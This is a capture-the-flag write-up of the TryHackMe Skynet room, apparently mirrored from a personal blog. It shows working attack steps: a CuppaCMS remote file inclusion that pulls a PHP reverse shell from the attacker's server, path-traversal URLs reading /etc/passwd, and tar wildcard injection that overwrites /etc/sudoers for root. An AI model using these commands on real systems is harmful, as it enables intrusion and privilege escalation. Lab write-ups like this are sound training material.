THM - Skynet – Recursive Pointer – .blog
source link: https://sebport0.github.io/thm-skynet/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
On this writeup we will cover the Skynet room from TryHackMe. It was a fun room to do. The trick to get the last flag is amazing. Its an eye opener on how to use old and know stuff to bend the rules.
Writeup
I’m not comfortable with guessing. It makes me feel that I’m missing something but sometimes it just works. In this case, we can guess that there is a miles
user somewhere on the system. Of course, the real Miles user could have gone with the nickname IL0r0bot!s and by guessing we will never have found this.
Let’s do some scanning
$nmap -sV $TARGETIP
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-12 20:27 -03
Nmap scan report for 10.10.127.59
Host is up (0.34s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
110/tcp open pop3 Dovecot pop3d
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel
6 open TCP ports, from which
-
80, says its an HTTP service. In fact, opening the browser and going to $TARGETIP:80 takes us to a search website.
-
110 is running Dovecot. It’s an open source email service for Linux/Unix.
-
445 is running Samba.
Let’s see if the Dovecot client has something useful waiting for us. We can connect to it
$nc $TARGETIP 110
+OK Dovecot ready.
This link contains an useful selection of commands that we can test. We can’t do anything on the POP/IMAP servers if we are not logged in. Maybe our username guess helps us
USER miles
-ERR [AUTH] Plaintext authentication disallowed on non-secure (SSL/TLS) connections.
USER Miles
-ERR [AUTH] Plaintext authentication disallowed on non-secure (SSL/TLS) connections.
Or maybe not. Login is deactivated on the service. Bad luck. Let’s put the Samba service to test. We can connect to it with smbclient
$smbclient //$TARGETIP/anonymous
Enter WORKGROUP\sam's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Nov 26 13:04:00 2020
.. D 0 Tue Sep 17 04:20:17 2019
attention.txt N 163 Wed Sep 18 00:04:59 2019
logs D 0 Wed Sep 18 01:42:16 2019
9204224 blocks of size 1024. 5828764 blocks available
For password, since we are anonymous, just press ENTER. We can see a logs
dir and a very interesting attention.txt file. We can read it with
more attention.txt
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson
Interesting. Let’s go to the logs folder, maybe it contains default passwords for each user to login?
smb: \> cd logs
smb: \logs\> ls
. D 0 Wed Sep 18 01:42:16 2019
.. D 0 Thu Nov 26 13:04:00 2020
log2.txt N 0 Wed Sep 18 01:42:13 2019
log1.txt N 471 Wed Sep 18 01:41:59 2019
log3.txt N 0 Wed Sep 18 01:42:16 2019
9204224 blocks of size 1024. 5828212 blocks available
Of those files, only log1.txt contains something, a list of words. They look like passwords or users. We should save it for later.
It looks like we are stuck now. We can’t login to the email service and the Samba service doesn’t seems to have more useful stuff. Well, we didn’t try anything on the search website. Looking at the source and playing with different search patterns doesn’t seem to take us anywhere. Maybe we can try to look for some interesting directories with gobuster?
$gobuster dir -u http://$TARGETIP:80 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.47.159:80
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/04/12 23:04:19 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/.hta (Status: 403) [Size: 277]
/admin (Status: 301) [Size: 312] [--> http://10.10.47.159/admin/]
/config (Status: 301) [Size: 313] [--> http://10.10.47.159/config/]
/css (Status: 301) [Size: 310] [--> http://10.10.47.159/css/]
/index.html (Status: 200) [Size: 523]
/js (Status: 301) [Size: 309] [--> http://10.10.47.159/js/]
/server-status (Status: 403) [Size: 277]
/squirrelmail (Status: 301) [Size: 319] [--> http://10.10.47.159/squirrelmail/]
===============================================================
2022/04/12 23:07:11 Finished
Squirremail? A quick search shows us that squirrelmail is an
email client written in PHP. This is good. If we go to
http://$TARGETIP/squirrelmail we’ll see a new login page. Maybe we can guess?
Remember the log1.txt
file from before. A tool like Burpsuite might be the
right choice to try different combinations of user and password, but a custom
script or manual trying gets the job done too. I was about to give up when the
important.txt
file saved me, if we pay attention, we can see the Miles user
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson
Again, I don’t like guessing but when it works, it works. In fact, log1.txt
is a list of passwords.
Inside the squirrelmail site, we can find the Miles inbox. It has three emails. One of them will give us the SMB password. Back to the smblcient
$smbclient -L $TARGETIP -U milesdyson
Enter WORKGROUP\milesdyson's password:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk Skynet Anonymous Share
milesdyson Disk Miles Dyson Personal Share
IPC$ IPC IPC Service (skynet server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
Checking Dyson’s samba share
$smbclient //$TARGETIP/milesdyson -U milesdyson
Enter WORKGROUP\milesdyson's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Sep 17 06:05:47 2019
.. D 0 Wed Sep 18 00:51:03 2019
Improving Deep Neural Networks.pdf N 5743095 Tue Sep 17 06:05:14 2019
Natural Language Processing-Building Sequence Models.pdf N 12927230 Tue Sep 17 06:05:14 2019
Convolutional Neural Networks-CNN.pdf N 19655446 Tue Sep 17 06:05:14 2019
notes D 0 Tue Sep 17 06:18:40 2019
Neural Networks and Deep Learning.pdf N 4304586 Tue Sep 17 06:05:14 2019
Structuring your Machine Learning Project.pdf N 3531427 Tue Sep 17 06:05:14 2019
9204224 blocks of size 1024. 5815708 blocks available
ROFL. I love such nerdy touchs.
smb: \> cd notes
Inside notes
smb: \notes\> ls
. D 0 Tue Sep 17 06:18:40 2019
.. D 0 Tue Sep 17 06:05:47 2019
3.01 Search.md N 65601 Tue Sep 17 06:01:29 2019
4.01 Agent-Based Models.md N 5683 Tue Sep 17 06:01:29 2019
2.08 In Practice.md N 7949 Tue Sep 17 06:01:29 2019
0.00 Cover.md N 3114 Tue Sep 17 06:01:29 2019
1.02 Linear Algebra.md N 70314 Tue Sep 17 06:01:29 2019
important.txt N 117 Tue Sep 17 06:18:39 2019
6.01 pandas.md N 9221 Tue Sep 17 06:01:29 2019
3.00 Artificial Intelligence.md N 33 Tue Sep 17 06:01:29 2019
2.01 Overview.md N 1165 Tue Sep 17 06:01:29 2019
3.02 Planning.md N 71657 Tue Sep 17 06:01:29 2019
<-- snip -->
9204224 blocks of size 1024. 5813844 blocks available
Look at important.txt
. Bingo. We have a secret dir that we can access through
the browser. Nothing. Since we are in dir mania, let’s fire gobuster again
$gobuster dir -u http://$TARGETIP/$SECRETDIR -w /usr/share/wordlists/dirb/small.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.5.168/$SECRETDIR
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/04/15 17:01:52 Starting gobuster in directory enumeration mode
===============================================================
/administrator (Status: 301) [Size: 335] [--> http://10.10.5.168/$SECRETDIR/administrator/]
Note: the SECRETDIR variable contains the dir that we found on important.txt
And we have… another login form! We have a CuppaCMS running here. If we try to login using either of the passwords from before the login fails. If we look at the login request, we can see a cookie going around
Cookie: PHPSESSID=f5ivm3unv15b81aav66k4bu1c7
Ok, so the we are running on PHP here. Maybe we can manipulate the cookie? A few tests after, it turns out that this might not be the best idea.
What if we try to search for vulnerabilities? Exploitsdb shows only one
vulnerability. By the way, if we look at the source from the
web console we can find the service version inside js/tiny_mce/tiny_mce.js
,
in this case the version is 3.4.4.
What about metasploit? A quick serach on metasploit doesn’t show anything for cuppa. We’ll have to try the exploit and include a reverse web shell inside the target.
Because I’m using ParrotOS, I can make use of the php reverse shell inside /usr/share/webshells/php. Remember to change the script’s ip and port to the ones of your local machine.
Start an http server
$python3 -m http.server 8080
And start a netcat session with the port configured inside the php reverse shell script. In my case is the 4445 port
$nc -lnvp 4445
Make use of the vulnerability to download the reverse shell file to the target server
http://$TARGET_IP/$SECRETDIR/administrator/alerts/alertConfigField.php?urlConfig=http://$LOCAL_IP:8080/php_reverse_shell.php
If all goes ok, we will see something like
$nc -lnvp 4445
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::4445
Ncat: Listening on 0.0.0.0:4445
Ncat: Connection from $TARGETIP.
Ncat: Connection from $TARGETIP:36038.
Linux skynet 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
15:59:28 up 25 min, 0 users, load average: 0.00, 0.00, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
It works! But, what is going on here? If we look at the exploitsdb page, we
can see that CuppaCMS is vulnerable to a PHP code injection. It will ask and
execute whatever is inside the request urlConfig
field. Dangerous stuff.
Going back to the CTF, we have a shell inside our target. This means that we can find the user flag with a quick search
$ find / -name user.* 2>/dev/null
Now, the root flag is the only one that remains. After some poking around,
the /etc/crontab
shows us something promising
$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
*/1 * * * * root /home/milesdyson/backups/backup.sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
Crontab shows us that there is an backup.sh script that is run as root every minute. Can we look at it?
$ cat backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *
It’s making a backup of the entire /var/www/html directory and saving it inside the backups folder as backup.tgz. What now?
Attempting to replace the backup.sh script fails
$ echo "/bin/sh" > backup.sh
/bin/sh: 32: cannot create backup.sh: Permission denied
Following this excellent writeup from Kahvi0xFF because I had no clue shows us the remaining steps and how to exploit the wildcard on the tar command. Crazy stuff. Insane stuff! It’s great!
We must move to /var/www/html. Tar is taking every file from there and adding it
to the backup as implied by the *
. We can do
echo 'echo "www-data ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > privesc.sh
echo "/var/www/html" > "--checkpoint-action=exec=sh privesc.sh"
echo "/var/www/html" > --checkpoint=1
What is this magic? First, we create a privesc.sh
script that will add our
current user(as we can easily see with the id or whoami commands) to the
/etc/sudoers file. VIP access. For whats next, if we take a look
at the tar manual page, we can see that --checkpoint-action
and
--checkpoint
are two flags. With the first flag we can tell tar to execute
an action on every checkpoint. And what are we telling tar to execute after the
first checkpoint? The script that adds our current user to the sudoers! The *
wildcard will fool tar into thinking that the checkpoint files are flags! More
info on this exploit can be found here.
Now we only need to wait for the cronjob to execute to get root access and read the last flag
sudo find / -name root.txt
Extras
We can also retrieve /etc/passwd using the cuppa exploit
http://$TARGETIP/$SECRETDIR/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
But this does not work with /etc/shadow. Also, we can retrieve /etc/crontab
http://$TARGETIP/$SECRETDIR/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/crontab
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK